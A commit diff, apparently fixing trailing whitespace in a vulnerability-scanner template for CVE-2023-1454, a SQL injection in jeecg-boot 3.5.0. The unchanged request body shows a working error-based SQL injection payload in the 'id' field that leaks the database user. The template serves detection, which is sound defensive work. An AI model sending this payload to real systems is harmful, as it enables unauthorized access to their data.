fix trail space
parent
82530ca7f7
commit
1e85ca79d8
|
@ -5,7 +5,7 @@ info:
|
|||
author: DhiyaneshDK
|
||||
severity: critical
|
||||
description: |
|
||||
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
|
||||
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.
|
||||
reference:
|
||||
- https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-1454
|
||||
|
@ -29,7 +29,6 @@ http:
|
|||
Content-Type: application/json;charset=UTF-8
|
||||
|
||||
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
Loading…
Reference in New Issue